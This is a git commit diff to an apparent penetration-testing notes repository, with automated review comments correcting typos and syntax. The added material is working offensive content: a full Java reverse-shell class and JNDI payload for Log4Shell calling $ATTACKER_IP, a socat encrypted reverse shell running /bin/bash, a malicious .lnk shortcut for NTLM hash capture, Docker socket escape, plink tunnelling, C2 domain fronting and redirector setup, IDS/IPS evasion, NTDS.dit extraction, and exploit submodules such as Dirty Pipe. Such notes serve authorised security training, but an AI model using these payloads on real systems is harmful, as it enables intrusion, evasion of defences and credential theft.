This commit is contained in:
Stefan Friese 2022-03-10 01:31:54 +01:00
parent 32fa6a672b
commit a3a6f09472
19 changed files with 333 additions and 7 deletions

.gitmodules vendored (21 changes)

@ -139,3 +139,24 @@
[submodule "exploit/windows/printspoofer"] [submodule "exploit/windows/printspoofer"]
path = exploit/windows/printspoofer path = exploit/windows/printspoofer
url = https://github.com/dievus/printspoofer.git url = https://github.com/dievus/printspoofer.git
[submodule "post_exploitation/powershell"]
path = post_exploitation/powershell
url = https://github.com/puckiestyle/powershell.git
[submodule "enumeration/network_scanners/kotlin-port-scanner"]
path = enumeration/network_scanners/kotlin-port-scanner
url = https://github.com/Hydragyrum/kotlin-port-scanner.git
[submodule "exploit/macOS/ds_store_exp"]
path = exploit/macOS/ds_store_exp
url = https://github.com/lijiejie/ds_store_exp.git
[submodule "exploit/macOS/DS_Store_crawler_parser"]
path = exploit/macOS/DS_Store_crawler_parser
url = https://github.com/anantshri/DS_Store_crawler_parser.git
[submodule "exploit/macOS/Python-dsstore"]
path = exploit/macOS/Python-dsstore
url = https://github.com/gehaxelt/Python-dsstore.git
[submodule "post_exploitation/armitage"]
path = post_exploitation/armitage
url = https://gitlab.com/kalilinux/packages/armitage.git
[submodule "exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit"]
path = exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit
url = https://github.com/cspshivam/CVE-2022-0847-dirty-pipe-exploit.git
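Review bot: the new `exploit/macOS/*` submodule paths mix three naming styles (`ds_store_exp`, `DS_Store_crawler_parser`, `Python-dsstore`) because they copy the upstream repository names; the `url` lines have to keep those names, but the `path` lines are local and could follow one convention so the tree stays navigable. This hunk also pulls in seven third-party repositories with no description of what each is for; a one-line entry per submodule in the matching docs file would help the next reader.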

enumeration/docs/ldap.md, new file (15 lines)

@ -0,0 +1,15 @@
# LDAP
## Get Domain
```sh
ldapsearch -x -h $TARGET_IP -s base namingcontexts
```
## Domain Dump
* If a set of credentials are known via
```sh
ldapdomaindump $TARGET_IP -u '<domain>\<user>' -p '<password>' --no-json --no-grep
```
* Take a look at the genreated HTML files
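Review bot: `genreated` in the last bullet should be `generated`, and `If a set of credentials are known via` should read `If a set of credentials is known`. Also, `ldapsearch -h` is deprecated in current OpenLDAP client tools in favour of a URI, so `ldapsearch -x -H ldap://$TARGET_IP -s base namingcontexts` is the form that keeps working.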

@ -0,0 +1 @@
Subproject commit 54bfab4c7cd09f9a6d50280af00f1984d5430a1e


@ -1,6 +1,11 @@
# Evil-winrm # Evil-winrm
* Put the stuff to download into a writeable/readable directory like `C:\Windows\Temp` * Put the stuff to download into a writeable/readable directory like `C:\Windows\Temp`
```sh ```sh
download C:\Windows\Temp\<file> download C:\Windows\Temp\<file>
``` ```
* The other way
```
upload yadayda
```
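Review bot: `upload yadayda` is a placeholder and its fence has no language tag, unlike the `sh` fence above it; document the real argument order, `upload <local_file> C:\Windows\Temp\<file>`, and tag the fence `sh` so both blocks render the same. `The other way` should also say what it is: copying a file from the attacker host to the target.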


@ -37,7 +37,7 @@ X-Api-Version: ${jndi:ldap://$ATTACKER_IP:1389/foo}
* A Proxy LDAP server to an HTTP server is needed * A Proxy LDAP server to an HTTP server is needed
* Compile following Java reverse shell via `javac Exploit.java -source 8 -target 8` to Exploit.class * Compile following Java reverse shell via `javac Exploit.java -source 8 -target 8` to Exploit.class
```sh ```java
public class Exploit { public class Exploit {
static { static {
try { try {
@ -48,12 +48,52 @@ public class Exploit {
} }
} }
``` ```
or another one
```java
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
public class Exploit {
static {
String host = "$ATTACKER_IP";
int port = 4711;
String cmd = "/bin/sh";
try {
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
while (!s.isClosed()) {
while (pi.available() > 0)
so.write(pi.read());
while (pe.available() > 0)
so.write(pe.read());
while (si.available() > 0)
po.write(si.read());
so.flush();
po.flush();
Thread.sleep(50);
try {
p.exitValue();
break;
} catch (Exception e) {
}
}
p.destroy();
s.close();
} catch (Exception e) {
}
}
}
```
* Run the LDAP, HTTP and reverse shell * Run the LDAP, HTTP and reverse shell
```sh ```sh
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://$ATTACKER_IP:8000/#Exploit" java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://$ATTACKER_IP:8000/#Exploit"
``` ```
```sh ```sh
php -S 0.0.0.:8000 php -S 0.0.0.0:8000
``` ```
```sh ```sh
nc -lvnp 4449 nc -lvnp 4449
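Review bot: the added Java class connects to port `4711` while the listener below is `nc -lvnp 4449`, so the two halves of this hunk do not match; use one port in both places. In the class itself, `redirectErrorStream(true)` already merges stderr into the process stdout, so the `pe = p.getErrorStream()` loop is dead code, and the two empty `catch (Exception e) {}` blocks swallow every failure silently, which makes a non-working `Exploit.class` hard to diagnose; at least print the exception. Note as well that `"$ATTACKER_IP"` inside a Java string literal is not expanded by the shell and has to be edited by hand before `javac`. The `0.0.0.:8000` to `0.0.0.0:8000` fix is correct.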

@ -0,0 +1 @@
Subproject commit e1fd1f65caa686bbb1510ae07efbdc3a0e4b8330

@ -0,0 +1 @@
Subproject commit 9e003a3196570a8e882e55cf9824fd3bf98886be

@ -0,0 +1 @@
Subproject commit 859781b834244774cb509e96ccc29ee646f72739

@ -0,0 +1 @@
Subproject commit 784eada6cd08739032b7fdc124a8c93abcb0c2f7


@ -0,0 +1,14 @@
# .lnk exploit
* [Trendmicro's article](https://www.trendmicro.com/en_us/research/17/e/rising-trend-attackers-using-lnk-files-download-malware.html)
* [mamachine's tool](http://mamachine.org/mslink/index.en.html)
* Target does not even have to open the link directly
```sh
mslink_v1.3.sh -l notimportant -n shortcut -i \\\\$ATTACKER_IP\\yo -o shortcut.lnk
```
* Start a responder and wait for user's hash
```sh
responder -I eth0
```
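Review bot: `Target does not even have to open the link directly` should say why, because that is the detection-relevant part: the `-i` icon path `\\$ATTACKER_IP\yo` is resolved when Explorer renders the shortcut, which causes an outbound SMB authentication attempt; blocking SMB egress from workstations and alerting on SMB connections to unknown hosts is what catches it. `user's hash` is more precisely the Net-NTLM challenge-response that Responder captures, and `-I eth0` hard-codes the interface, so mention that it has to match the host.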

misc/hadoop.md, new file (57 lines)

@ -0,0 +1,57 @@
# Hadoop
Distributed storage and computing
* [Hadoop Attack Libs](https://github.com/wavestone-cdt/hadoop-attack-library.git)
## Terminology
* __Cluster__, forms the datalake
* __Node__, single host inside the cluster
* __NameNode__, node that keeps the dir tree of the Hadoop file system
* __DataNode__, slave node that stores files and is instructed by the NameNode
* __Primary NameNode__, current active node responsible for keeping the directory structure
* __Secondary NameNode__, hot standby for Primary NameNode. There may be multiple on standby inside the cluster
* __Master Node__, Hadoop management app like HDFS or YARN Manager
* __Slave Node__, Hadoop worker like HDFS or MapReduce. a node can be master and slave at the same time
* __Edge Node__, hosting Hadoop user app like Zeppelin or Hue
* __Kerberised__, security enabled cluster through Kerberos
* __HDFS__, Hadoop Distributed File System, storage device for unstructured data
* __Hive__, primary DB for structured data
* __YARN__, scheduling jobs and resource management
* __MapReduce__, distributed filtering, sorting and reducing
* __HUE__, GUI for HDFS and Hive
* __Zookeeper__, cluster management
* __Kafka__, message broker
* __Ranger__, privileged ACL
* __Zeppelin__, data analytivs inside a webUI
## Zeppelin
* Try [default logins](https://zeppelin.apache.org/docs/0.8.2/setup/security/shiro_authentication.html#4-login)
* Try execution inside notebooks
## Ktabs
* Finding `ktpass`es to authenticate at the kerberos TGS
* Output principals and use them to init
```sh
klist -k <keytabfile>
kinit <prinicpal name> -k -V -t <keytabfile>
```
## HDFS
* User the `hdfs` utility to enumerate the distributed network storage
```sh
hdfs dfs -ls /
```
* Current user and user on the storage do not have to correspond
* Touched files on the storage may be owned by root
```sh
hdfs dfs -touchz testfile /tmp/testfile
hdfs dfs -ls /tmp
```
* Impersonate by sourcing keytab file of the user, __NodeManager__ is the highest user in regards to permission
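Review bot: two terminology entries are wrong for Hadoop. `Secondary NameNode, hot standby` describes the Standby NameNode of an HA pair; the Secondary NameNode only merges fsimage and edits checkpoints and cannot take over. `__NodeManager__ is the highest user in regards to permission` confuses a YARN daemon with an account; the HDFS superuser is the account the NameNode runs as, typically `hdfs`. The heading `Ktabs` should be `Keytabs`, and `ktpass` is the Windows tool that creates keytabs, so the bullet means `Finding keytab files`. Typos: `prinicpal`, `User the hdfs utility` (Use), `analytivs`. Finally, `hdfs dfs -touchz testfile /tmp/testfile` creates two files, `testfile` in the user's home directory and `/tmp/testfile`, which is probably not what the next `-ls /tmp` intends to show.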


@ -125,7 +125,20 @@ curl -X POST -H "Content-Type: application/json" --unix-socket /var/run/docker.s
```sh ```sh
curl-amd64 -X POST -H "Content-Type:application/json" --unix-socket /var/run/docker.sock http://localhost/containers/<ID>/start curl-amd64 -X POST -H "Content-Type:application/json" --unix-socket /var/run/docker.sock http://localhost/containers/<ID>/start
``` ```
* Login in to the host via ssh * Login in to the host via ssh remotely or socat locally
```sh
socat - UNIX-CONNECT:/var/run/docker.sock
POST /containers/<CONTAINERID>/attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1
Host:
Connection: Upgrade
Upgrade: tcp
HTTP/1.1 101 UPGRADED
Content-Type: application/vnd.docker.raw-stream
Connection: Upgrade
Upgrade: tcp
```
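Review bot: the socat block mixes the hand-typed request and the daemon's reply in one fence with nothing separating them, and the request is incomplete: `Host:` has no value and the request has to end with a blank line before the daemon answers. Either comment the lines (`# you type:` / `# reply:`) or split them into two fences, and give `Host:` a value such as `localhost`.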
## Escape through DB ## Escape through DB
* Login into DB * Login into DB


@ -60,6 +60,10 @@ cmd.exe /c echo y | .\plink.exe -R <LocalPort>:<TargetIP>:<TargetPort> <user>@<J
```sh ```sh
puttygen <keyfile> -o key.ppk puttygen <keyfile> -o key.ppk
``` ```
* Circumvention, described by [U.Y.](https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d)
```sh
echo y | &.\plink.exe -ssh -l <MYUSERNAME> -pw <MYPASSWORD> -R <MYIP>:<MYPORT>:127.0.0.1:<TARGETPORT> <MYIP>
```
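Review bot: the added one-liner is PowerShell (`&.\plink.exe` is the call operator), not `sh`, so tag the fence accordingly, and `Circumvention` should say what is circumvented: the interactive host-key prompt, answered by piping `y`. Passing `-pw <MYPASSWORD>` on the command line leaves the password in process listings and PowerShell history, which the key-based `puttygen` route directly above avoids; mention that trade-off next to the command.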
### Socat ### Socat
* Reverse shell on target via * Reverse shell on target via

@ -0,0 +1 @@
Subproject commit d07b0227e9ba0dc6de0c688a44ed17803c5216c6


@ -2,3 +2,44 @@
* [Matrix](https://www.thec2matrix.com/) * [Matrix](https://www.thec2matrix.com/)
* [bcsecurity](https://www.bc-security.org/) maintains Empire 4 * [bcsecurity](https://www.bc-security.org/) maintains Empire 4
* [Empire](https://github.com/BC-SECURITY/Empire.git)
* [Armitage](https://gitlab.com/kalilinux/packages/armitage.git)
* [Covenant](https://github.com/cobbr/Covenant)
* [Sliver](https://github.com/BishopFox/sliver)
* Server
* Listener
* Payloads/Agents
* Staged/Dropper
* Stageless
* Beacons from Agents, disguised through jitter
* Modules
* Post Exploitation
* Pivoting
## Domain Fronting
* Use a Domain on the C2 server
* User Cloudflare to proxy the request and responses to and from the target
* Use HTTPs for channel encryption
## Profiles
* Server evaluates by custom user-agents to identify agents
## Types
* Std listener, TCP or UDP
* HTTP/HTTPS, counter FW
* DNS, if internet access of the target is flaky
* SMB, counter network segments
## Redirector
* Apache or nginx as reverse proxy in front of the c2 server
* FW is still needed in front of the redirector
* These get burned instead of the c2
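Review bot: `User Cloudflare` should be `Use Cloudflare`, `HTTPs` should be `HTTPS`, and `Server evaluates by custom user-agents to identify agents` reads better as `The server identifies its agents by a custom User-Agent`. `counter FW` and `counter network segments` are shorthand the reader has to guess at; spell out that HTTP/HTTPS blends in with allowed web traffic and that SMB is for hosts without a direct outbound route. The `Server`/`Listener`/`Payloads` list sits under the `Sliver` bullet but describes general C2 components, so it probably belongs one level up.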


@ -0,0 +1,79 @@
# IDS & IPS Evation
* Evation by manipulation of
* Protocol
* Payload
* Route
* Or DoS
## Protocol Manipulation
### Relying on another protocol
* `nc -ulvnp 4711` for listening to incoming UDP traffic
* `nc -u $TARGET_IP $TARGET_PORT` for connecting through UDP
### Manipulation of the source's or LHOST's network port
* `nmap -g 80` or `nmap --source-port 53` to send outgoing nmap traffic through it
### Session splicing by fragmentation and segmentation
* `nmap` fragmentation in 8 bytes `-f`, 16 bytes `-ff`, `--mtu <size>` for MTU
* Use [Fragroute](https://www.monkey.org/~dugsong/fragroute/) with `ip_frag <num>` in `fragroute.conf`, then use `fragroute -f fragroute.conf $TARGET_IP`
### Sending invalid packets
* Invalid protocol header flags and checksums via`nmap --badsum`, `nmap --scanflags URG/ACK/PSH/RST/SYN/FIN`, e.g. concatentation of multiple flags `nmap --scanflags SYNRSTFIN`
* `hping3` including `--ttl`, `--badsum`, header flags `-S`,`-A`,`-P`,`-U`,`-F`,`-R`
## Payload Manipulation
### Obfuscation and Encoding
* Base64
* URL
* Escaped Unicode Characters
### Encrypting Communication Channels
* Use socat with encryption
```sh
openssl req -x509 -newkey rsa:2048 -days 356 -subj '/CN=www.example.com/O=YO/C=FR' -nodes -keyout id_rsa.key -out reverse.crt
```
* Create `.pem` (Privacy Enhanced Mail) file via
```
cat id_rsa.key reverse.crt > reverse.pem
```
* Listening on attacker side
```sh
socat -d -d OPENSSL-LISTEN:4711,cert=reverse.pem,verify=0,fork STDOUT
```
* On target
```sh
socat OPENSSL:$ATTACKER_IP:4711,verify=0 EXEC:/bin/bash
```
### Modification of Data
* Order of parameters, instead of `nc -lvnp` it is `nc -vpnl`
* Adding whitespaces to the commands
* Use aliases
## Route Manipulation
### Relying on Source Routing
* `nmap --ip-options "L 10.10.20.30 10.10.30.40` routes through these IPs loosely
* `nmap --ip-options "S 10.10.20.30 10.10.30.40"` routes through the IPs strictly
### Using Proxyy Servers
* `nmap -sS http://$PROXY1:80,socks4://$PROXY:8080 $TARGET_IP`
## Tactical DoS
* Non malicious, benign traffic against
* IDS/IPS
* Logging server
## MISC
* Changing
* `User-Agent`
* Request frequency and duration of sleep
* SSL/TLS certs
* DNS beacon, storing exfiltrated data in the query
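Review bot: the `nmap --ip-options "L 10.10.20.30 10.10.30.40` line is missing its closing quote. `nmap -sS http://$PROXY1:80,socks4://$PROXY:8080 $TARGET_IP` is not valid nmap syntax: proxies are given with `--proxies <list>`, and nmap honours them only for TCP connect scans (`-sT`) and NSE, never for raw `-sS` SYN scans, so the bullet as written does not do what it claims. `-days 356` in the openssl line is probably meant to be `365`. Spelling: `Evation` twice (title and first bullet, should be Evasion), `Proxyy`, `concatentation`, and `via` in the `--badsum` bullet is missing a space before the backtick.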


@ -58,3 +58,33 @@ set PAYLOAD windows/meterpreter/reverse_http
run -j run -j
``` ```
* Copy into powershell/cmd * Copy into powershell/cmd
## Reverse Proxy
* Hide behind reverse proxy, e.g. apache
* In case of an apache, these modules must be enabled
* rewrite
* proxy
* proxy_http
* headers
* Use `User-Agent` to identify targets
```ucl
<VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} "^User-Agent$"
ProxyPass "/" "http://localhost:8080/"
<Directory>
AllowOverride All
</Directory>
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
```
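Review bot: the Apache snippet does not do what the bullets say. `RewriteCond %{HTTP_USER_AGENT} "^User-Agent$"` is never followed by a `RewriteRule`, so it has no effect, while `ProxyPass "/" "http://localhost:8080/"` forwards every request unconditionally; to proxy only requests with the expected User-Agent, drop `ProxyPass` and add `RewriteRule "^/(.*)$" "http://localhost:8080/$1" [P,L]` after the condition (this uses the `proxy` and `proxy_http` modules the bullets already list, and everything else falls through to `DocumentRoot`). `<Directory>` needs a path argument, e.g. `<Directory /var/www/html>`, `"^User-Agent$"` is a placeholder and should be marked as one, and the fence is tagged `ucl` where `apache` is the usual tag. `In case of an apache` reads better as `For Apache`.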


@ -6,21 +6,21 @@
* Check `whoami /all` * Check `whoami /all`
* `SeBackupPrivilege` must be present * `SeBackupPrivilege` must be present
* [Payloads all the things](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#using-diskshadow-a-windows-signed-binary) * [Payloads all the things](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#using-diskshadow-a-windows-signed-binary)
* Upload `diskshadow.txt` to the target with the following content * Upload `diskshadow.txt` to the target with the following content, there has to be a space at the end of each line!!!!
```sh ```sh
set metadata C:\tmp\tmp.cabs set metadata C:\tmp\tmp.cabs
set context persistent nowriters set context persistent nowriters
add volume c: alias someAlias add volume c: alias someAlias
create create
expose %someAlias% h: expose %someAlias% h:
``` ```
* Change dir to `C:\Windows\System32` and `diskshadow.exe /s C:\Path\to\diskshadow.txt` * Change dir to `C:\Windows\System32` and `diskshadow.exe /s C:\tmp\diskshadow.txt`
* Upload these [dlls](https://github.com/giuliano108/SeBackupPrivilege) to the target * Upload these [dlls](https://github.com/giuliano108/SeBackupPrivilege) to the target
```sh ```sh
import-module .\SeBackupPrivilegeUtils.dll import-module .\SeBackupPrivilegeUtils.dll
import-module .\SeBackupPrivilegeCmdLets.dll import-module .\SeBackupPrivilegeCmdLets.dll
copy-filesebackupprivilege h:\windows\ntds\ntds.dit C:\tmp\ntds.dit -overwrite copy-filesebackupprivilege h:\windows\ntds\ntds.dit C:\tmp\ntds.dit -overwrite
reg save HKLM\SYSTEM C:\Path\to\uploads\system reg save HKLM\SYSTEM C:\tmp\system
``` ```
* Downloads the files `ntds.dit` and `system` * Downloads the files `ntds.dit` and `system`
* Extract the hashes via * Extract the hashes via
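Review bot: `there has to be a space at the end of each line!!!!` is the substantive part of this change, but trailing spaces inside a fenced block are invisible in the rendered file and are stripped by editors configured to trim whitespace, so state it once without the exclamation marks and warn that whitespace-trimming editors will break the file. The `import-module` fence is PowerShell, not `sh`; `Downloads the files` should be `Download the files`. The path change to `C:\tmp` is a good fix since it now matches `set metadata C:\tmp\tmp.cabs`.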

@ -0,0 +1 @@
Subproject commit 81e5fba23f24fb74eaabeeb8665c9f9dff4c535b